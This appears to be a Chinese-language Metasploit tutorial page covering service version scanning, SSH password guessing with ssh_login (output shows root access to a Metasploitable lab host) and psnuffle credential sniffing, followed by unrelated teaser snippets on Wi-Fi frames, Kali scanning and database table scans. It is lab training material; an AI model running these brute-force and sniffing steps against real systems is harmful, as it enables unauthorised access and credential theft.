msf > search name:_version 服務查點輔助模組
一,常見的網路服務掃瞄
1.telnet服務掃瞄
use auxiliary/scanner/telnet/telnet_version
set rhosts 10.10.10.0/24
set threads 100
run無結果
2.ssh服務掃瞄
代替了telnet,具有安全性
use auxiliary/scanner/ssh/ssh_version
set rhosts 10.10.10.0/24
set threads 100
run3.oracle資料庫服務查點
漏洞頻發重災區
microsoft sql server 1433
oracle sql ***(tnslsnr) 1521
use auxiliary/scanner/oracle/tnslsnr_version
set threads 50
run4.開放**探測與利用
網路隱藏身份:**伺服器(proxy),vpn
open_proxy模組,獲取免費的http**伺服器位址
run更好的是vpn服務,可以自主架設openvpn
二,口令猜測與嗅探
1.ssh服務口令猜測
use auxiliary/scanner/ssh/ssh_login
set rhosts 10.10.10.254
set username root (也可以用user_file)指定多個使用者名稱
set pass_file /root/words.txt (就在linux下的root裡建立字典
(可以用userpass_file代替上面2個引數,使用者口令字典)
set threads 50
run10.10.10.254:22 ssh - failed: 'root:123456'
[+] 10.10.10.254:22 ssh - success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root)
linux metasploitable 2.6.24-16-server #1
smp thu apr 10 13:58:00 utc 2008 i686 gnu/linux '
即獲取了一台伺服器訪問權
2.psnuffle口令嗅探
截獲常見協議的身份認證過程,講使用者名稱和口令資訊記錄下來
只有在能夠接入對方網路的初始訪問點
use auxiliary/sniffer/psnuffle
run
主動掃瞄與被動掃瞄
之前要實現wifi上的探針模組,簡單了了解了802.11中的各種幀,對一些幀的傳送頻率和方式也有簡單了解。不過了解的都不夠細緻。只是簡單知道手機開啟wifi後回不停的向外傳送probe request這個幀,然後也在不停的監聽當前通道上ap廣播過來的beacon幀。這裡詳細介紹一下802.11中的主...
kali linux之服務掃瞄
識別開放埠上執行的應用。識別目標作業系統,提高攻擊效率 banner捕獲 軟體開發商,軟體名稱,服務型別,版本號 直接發現已知的漏洞和弱點 服務識別 作業系統識別 snmp分析 簡單網路管理協議,資訊查詢或重新配置,識別和繞過防火牆篩選 防火牆識別 nc nv ip port 獲取到banner資訊...
全表掃瞄與索引掃瞄
一,全表掃瞄 全表掃瞄是從讀取資料的同時通過where條件中的查詢條件來過濾來篩選出滿足條件的資料執行過程。其掃瞄的的物件是表中的所有資料塊,包括空資料庫,如果表中的資料大量被刪除,那麼就會存在大量的空資料塊,再次狀態下,大量的空資料塊也被掃瞄。在執行全表掃瞄時,按照順序每次將多個資料塊從磁碟讀取到...